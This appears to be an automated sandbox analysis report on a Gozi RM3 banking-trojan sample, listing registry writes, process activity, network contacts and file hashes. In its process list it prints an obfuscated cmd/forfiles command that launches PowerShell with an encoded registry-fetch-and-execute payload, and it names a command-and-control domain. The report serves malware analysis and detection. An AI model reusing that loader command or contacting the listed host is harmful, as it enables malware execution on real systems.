Analysis Overview
SHA256
7a381baee55dabd578bf198e4680d98d3057142cff19713612fc4bfa1ae39369
Threat Level: Known bad
The file 6175910434340864.zip was found to be: Known bad.
Malicious Activity Summary
Gozi RM3
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2022-03-16 16:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-16 16:30
Reported
2022-03-16 16:33
Platform
win7-20220310-en
Max time kernel
4294217s
Max time network
163s
Command Line
Signatures
Gozi RM3
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000007cf072077248e39221e2a83c60f4bf184e6b8050923858233d8d27c8e8a508ab000000000e800000000200002000000048428ed14926937f4adad551fb4a17dcf3a6e5a2ed9f937093050d32bb5b046830010000359648c2caa0193e62ce025f2b5b966b6362c0806b4eb7c447b0f1ec5b286bc34b30fdd86f8ab1f98b32c89862027a3fe63f250db0826ddde079618e969f28ccf34a3b8c969b2add0f5e1386ebfb2136a9708f0ba2c6dc95e6f14fbd6f4cfdb43c8578d36adcb521c3c37deb9250948f8e0ccb71298ed276c72583a070db16289d86d4b935f2e60ee65aa374f1db6b8303ac9a40f8714bda4daaab9cc4123060fdd8044bc10806aa82ae22ee5d4d7f699d079175bcd5aa111ea58100429907e3db461c85706cc6cbed2b3ce9dee6c10da0a4a0c5e6ba0f6e671bc6abfca9f91b156891cb6fef1d7b6f2ace3df9f5a83bbc4ee31cff827ffec42dc8be54a4fd4700c57955049b2d9a3225a17c7b799348eada9412374c7245954a71f8cf016c58774006e92900965e567bbe3ce419282740000000fa9ab390ba227381f86a49d0db870a0adeb7d7be8e59f9430af4ebcf6dab9dc8f53e55df28e5561b30366337128e0d0ae71adfdd50337142873d8b5a9fe4fc41 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0da9aef5b39d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000a5f01d672cb504e0f38e510a7940aaf2d260c035de4dd6d4ce7a5e667f3b7552000000000e800000000200002000000091c9ca13f6262fb088eeb3b6c260e620c37406e1f4c8337da8e6caf2b20226d230010000a0f959888115e0d51455f140d11c2511b1b2d3fb75c99833dca087efc655af16bd1818f52842bf838285ab9e8e2c49be7078d4f611bd754c8124724e044ef3dbd4ecd52e7d20cdc8834178e8a2e91b0a8304181729db0c5cba8fac1f4180059dc3f01507c4888bcca8773ad9b300e8b4e5be50c7e4dfe7fd58d477f96afa27e87348ff386750faaa1c8cd172a419987c580549a17426b7169103a81d44f94faf1682e6e36143ee48283062fe44c0e6b646e4830d51eb895f5c2747d16f8826272c1e65e946ebdb14f8dfaad3cd16d00ca61cd7e1889e7060295b26ba94280ef47a4a20ad8434a378198eb4e8baaf4342a48556e47913540dfe8a68ca34849e0b1f2f5f02fd9be0b71110c4da6327a5bf303dbec95ee0211f269dba87241c8fb8cfad669ac7754f2bcfc5c28cda4ce850400000008c59773314e8edf549bc4e47ccb386556198355fb6a24cf25bb4ccd3d830c0fe96f8b19a522b3bf9112d42af3ea6aedb023f3dcce3832bc904cdac06c73115c2 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000502621f4dee5e4c660c0a33665ed927bca546ed54d6d262de5b17e05ec31b93d000000000e80000000020000200000003923311a96764a154049d6de00214f5487c71adfc4bce1d0a364f56729217d11200000001d9984fda5041a6ce95fa0c63293f5ad3a61d35ee4a453dac1d8c6357422f45740000000862082c8e2ecb82934413be4f7f603715ac4f6b4b7b123c904145de6064fed3bbab776e2808428c1c06a75ec1184c41e5093c5459410818153137070c11bd3b5 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000006e565fb108b1a290b265c60cf7ccf5539e44705c707585c3e1e8203f5f811285000000000e80000000020000200000004339dba2bc2bad57517136f64debb0dfd094b147ced06f2cd2a624dd1dae880030010000ceaf60b77d9f2c7d173b77dba4a375dfe2b7bf8b4bd3930f67a192090380bd03cc705bec9d6f7f9456a5b9040861e51a782c7baace0ab5873abbc3edfb574ba67324701c4d48bd64d69f7cf7885710d53c9be3dd0301d2960eca12ec0cd94eec9385fcfb9d50d77d6cb03283b07829b54ee48e1a1299a2e04dffa34a6515d057eae756ae286447bda35187a02e0a2e9f80f255fa63f8a01577d52e0e6002d5dade307fca4e03fadf8d833eac49c774c3127d7a139f200c881e9a3f526aa37b7aad866db42191093c785aecc0f56c7cadb942c395638db7ce6b220b4882b4a46f2c5ebe45cc5c151446263fa0f039b23905283412be6000bcf573abf0f8b03406e952d854e5248b8c21b62778374034d9add3aad9363441b2bdb9731bd2e80c4b0dd80ab11027bfdee0c3fca1215c93514000000056f26250f55d038b5d71cc35d72c9fef4fd1b5517f3c64588c389aceff7986013b0c3133fd31d6742e13e80aa7176277f5471cd34a5ae1b242e9d0ed8d2869ad | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000d683de8eee2fd249060338337c7061450760dc99306602a07d994f324f8bbfe0000000000e8000000002000020000000594f4226425452f687e612cef8a7b330ed5af70f31ddf6564d83f874f940254830010000ff371a739ebec82857baf266eefa7af9c46d43d26406af1d5917f677f428624372945efb8818b2428f0f94442515fdfe5bc57fdc3d20768e510307a59bb5209a7c64f766cbd7b0a97124de7646f8d93dfd0cbec297fa905b1fb842d97408df5c8f5118e055998ed15951f39267cbee9752b57211867b47496f0cfe06c1fe5bbb525d6b80c968a67feb0c460a648d6db023b3e2b4f27f4b1708effa986f144a5019882667e0640bca1652424c69f6a120e14e700be035eaa2f111bedcc037a865c5987a13fb855d188c470303fe7e8e7c64e70f066e1a226f762f8fb959d374199ccf4a92f3fe49e4644b501c555e1625b118839fbf7ea16c3ed8b807855a6328f5633d134d2aea99dd3a82e95f358d433089ec72038c1efd1b9b822474e676e129e26fad92138e436262b5ea9f5367094000000042f12a709f4f0f48bd66ad30e659ddb93cefcb0274d818ae306fc9c85f4a91598eab692c451d4258680678f4983b304bc186cb53e0afc077a282634e7d0cba5f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000007a1cdfeb1eee395815addea1a6ab0695d2dc8ac8b0c2c2c26c01ac1561617600000000000e80000000020000200000005b81b57d57b9c1a4c5691685dd426fe03738182da67132e26a793e81d1fcf52630010000be312739b455a47fbbc5785f35f52b1545027c940ff67d17119244efa378e365d89cdd4c9f7a9ee9a5db3e6257f036524253e094eaab94323ef39b0c42e324173d6935a3b91a2f6df4f5fe4eb44f98c84c90e3bb54073c89ecd8785532a4c422558416a8801e417661193c7a2b699cb2ce3f38cdc7b560a6a4372357ada9fca968d850bd0f4d9e6a99050718f784e2807096982f5d62b05d4041b32fe6757c291c0aa5a4ef1afed9f70229072f46a02091c7144d43ea01503f2db710fa5162765aa3c0aff788d4f4d2a67c4efa42f16285d43b7632f2d7485191faa88197d5f99bdc8b67cdbd5ff0e2a95503a7d102fb8e5eeecdff3bf7228dcc4cf5fd15594fe26aad2b3d8fb1dfe9a89abb29563e02e9bf5501b0107a14666ab4780d1b1f388e453545e734d538a56707d742d0d8b040000000fdfc9dd3d99d182838db47adc81b37c7cfdb0c25b16e37cc5018bd68ba930ca8e8f6b45ffd496931571d283ef4f61d22ccccc3d4038228fbc4de6702b4fc7aa7 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "354216919" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000374065f3eefb2c7c54bbed9cda8e83e308dfe2803b43a31fc42b7a78a1f7db2f000000000e80000000020000200000003093bdaf2a15e2f48d8f0ca2ee780a17e619ee948ee937c0c367f8073a05b942300100000d15b9e0506a8998b10ecf82b171f73ec1221e8a53e34e51af5f315548fc162c75f1016da26952899b8c6eaa5bd44803919856578257fbb7ebe65266d4c505ce25470e5ee068001c283c0d547af4fc8b9e8c505e41c04cfc218a068473b974f7f0e98b715a3e214a6eff8c180a15326a4eee8d3dd7e1c7e22b6e92d0a7b124c0e75c36e4fe1c5d53d6aa86b96eb6722a54535ed35b204b143dff1f2e660b9eddf83cb2ee245459c49aea455ffd6f80daa83dc5845719428fe7a7c5ae21a8e90e2272a228e7d11081b4426fad49d6345aef33f41ae824baa078d9273d03283064408eb5dd28e1ec88d674caf391ee1960b007627d7c7e4869d6f88df92f5c8e56943d93e1d960af9a99ee48b29e76444bbeea075759ba3067fe284336858b7bba408e0e86701022edd7773fbd0f498595400000007f1d1ae68c003e4dc20d81571836dc934045bf4587ca2e07b6e46b6af6d4e7140f597d9e742b2531329a63e7dc15875c77405ee05d20803316eb14a7ba0e9be1 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e50000000002000000000010660000000100002000000052b572945baf914c649c6abe4e40aeb625557860a43c8a0f03a894c4db604eac000000000e8000000002000020000000a657ce680ba15aa1ae2cf9f4af80f8ef4b8d918ff2c1b77e6fd85478027dab9b90000000c87f7c769605fcb65226b58e507c6c7daf8e00d7fb27a4e82e81bb8cadc26024e8a487639f7e4f9c1ac616a13e780180fb54ef73a94a78bc164395620cd25a1acc7bb3d0a3c6dbe89cad30c0f6615b6a5048dd4831b395e93202f5fcbb746e99d11559bb5a2fbc06e3989cf91b435d344370b9b65ede83b22b3bf8f049c55bf0cf4b322f4c05435af10cb2fe75f9146740000000917c420ad5b3b6313a592ebcce248f496a39c5008e17b8b45e5940525c6c0c15c715832f8e5e7cc85da4964d62492a16fd4512cb6c05758f555be59017ba6e00 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000008936e8eb855a0c5c62b67c3e425adbb28472d386fa4f3aa639c904e7c64c8c6f000000000e8000000002000020000000534a659bfb32e49202035d58a029ff1b2e60faadea476f8b31ffb824d51dfabf3001000054a40f0e76a70fb9444030868758cc981b9799ed186e351ff22740b74888ad48365cc8395cbacb03cf12d04600ea86389bbe8c92cc7f2d533ee17beb32780900873763f0ffe38590164781a75bc7b9d231bc48e4aac6b0c65091c861e8b73a813cb473c732e0a65fb3839136763bc262cc93698c85673e5ec23bd68ef346cd306f7529951289c275ca6cae81cb077d6af63d0161d23a7cc1ee064bf9c01a5f85d3adfbe5e772a632174fcb2ee4502b5e5fc4d5c7862c5685382830d5a792cfa7b7b6afc0aa8d9c8f8bbb7778b5f9417ffad15dc6fdfd14a7045e9473d75d29fd3e8ce36c84484be9e54dd6a483bce69295cb42c2947c6f5fcc399b33447e5ffe015da4ccc45c5a0b6ea7b8f55bdf4d19d7a3715be9c8e99e19581b964d68954587b8a57a71d28afd5230ef52ddbdb6754000000030d34340c2e0e114aa14fc050230abdd8b6325f4dfd86dd8ef27d839ae1c592f22b7aca9760dba72abed0900b1c5ee84a46f3059319bb8eb6f8c15a8b07dabc9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000005a16cd240216fa513519507c0ac4fff7aadd68fad40e7152371c0ebf0d37d97a000000000e8000000002000020000000201d81a2a3aa6c7f832e90cd857e967bc6aac52d3b7cfed4813ba3f7df622b103001000067242be2914cbb9c3a8b437a7c056c1068a6be7ab15897ef3171316db33860e514f11becbb61c9eb1e085381acca8576fbb88acc686d3984d15de783b69ea127817ea4b8f0de1bf9aa1cf5df31cd6fab8c1f4ce7d1b0d4fcbee8fde99bb7c98e58cc87ad2eadb3a39d03143a715d7780ab4681e5436a0548449168a2742136938553418d570e2409fd2572c8f4c316a49e629f2413d32de04865007fc16bd50ed9a4348c30b447b98c3686595bf2e445c7187b1d5abec10e444178a9b8ddc9bbb8c5995289e5c45de56d6ff259f91e1383a50b33bb0e50c888cfece49925718638e4eb1242249759f7d05ed21fd51b617ecec66e4da9eb10d22dd0fed5823503c21319ff194b2de2525c37cafff9ac205f9c69c58822b0f1a56c829b8c99652d5496632672b094ebd2ff1ea894e5806e40000000f6988e378c9a816694cfe28b98e6f9b55852aebc63c778787e865bdb67d7197fb5f12ca2902691f9753894aa823334d34f18817967726b787a760311b7453530 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F743E201-A54E-11EC-92D3-FED163790235} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000006c4eb6aa4f849bf88ffea6c20f11185e517b52be597b253072910d0510ee2286000000000e80000000020000200000007b19bb8ef125edbbce137c817d88e74dc9964e1ff02acc0ad7e40920ddad6d573001000028f274f51554a4abec97639540568a8b07f5fe3996c2bf0a43a8b0f746640894a19a4e1c68b373e06eafa7d2bf24789e135cabfa59aa54219d72a58e0e06a53856baa7b836dad5fed6753198b58cdb9152020fdc93d7a5df5148217f2a7ed2ddc371a4e8f0519e63c29342b0278fd1ef2bc615b3bb30000836bf52c32c3a393c3ee470510f4c6f4d27cdd9eb96a7949abe6d247660fee5dd297bba428c793dd8f1951117380d448f157027e00eda31b2751d4276840207b6ab2b5963b656b99c148b9fd0114ebb15c690877d44b601fb839a5877c62240fc404cab59505c46aa61338fb0a08b99bdb2803ac09c9d8e8b66390def06e5dac9f225f22f85389cc13501a542c10c5a3b48e0c773629d6638958df5d3131584fe8317928918da81df553c1393ba618baa4fcd3d1968bde61b40000000bc574cc45a18bd3476dd2bb7bf6480bdd94006586b18f54aa2bd3866121fee276843649c0fd265323b5bc08953d60b4feef84d35a531b0b5f86782598ccf5d80 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe
"C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1376 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1376 CREDAT:1717252 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/1824-54-0x000000000030E000-0x0000000000319000-memory.dmp
memory/1824-55-0x000000000030E000-0x0000000000319000-memory.dmp
memory/1824-56-0x00000000001B0000-0x00000000001BC000-memory.dmp
memory/1824-57-0x00000000759C1000-0x00000000759C3000-memory.dmp
memory/1824-58-0x0000000001000000-0x000000000106F000-memory.dmp
memory/1824-59-0x00000000001C0000-0x00000000001D0000-memory.dmp
memory/1824-65-0x00000000001F0000-0x00000000001F2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8dbe65040c7318b8462f79e56017594e |
| SHA1 | 4b51033360ddfef8ca0941addd60c162f618387a |
| SHA256 | c32824406974106533f3de5f86384302c582e83287571f36df0909457acbcbbe |
| SHA512 | 1bf2e8a9ea47fbe330a141c806bbc17078911a2a45c36c902179014fd59c4aaa88a0a45e290d716e5d06385d58f73ab72555c34822a44a6c10f936a34b093b21 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 65a0eb052cf68845a784b0d2c1a97f96 |
| SHA1 | 1902a40bc4fc63ecce5b1bcdf7634d8a325b6aea |
| SHA256 | 2fd7c28df0ed3c1897d4a7fff3068b40304b37daddf3031ffd6d863653d4c02d |
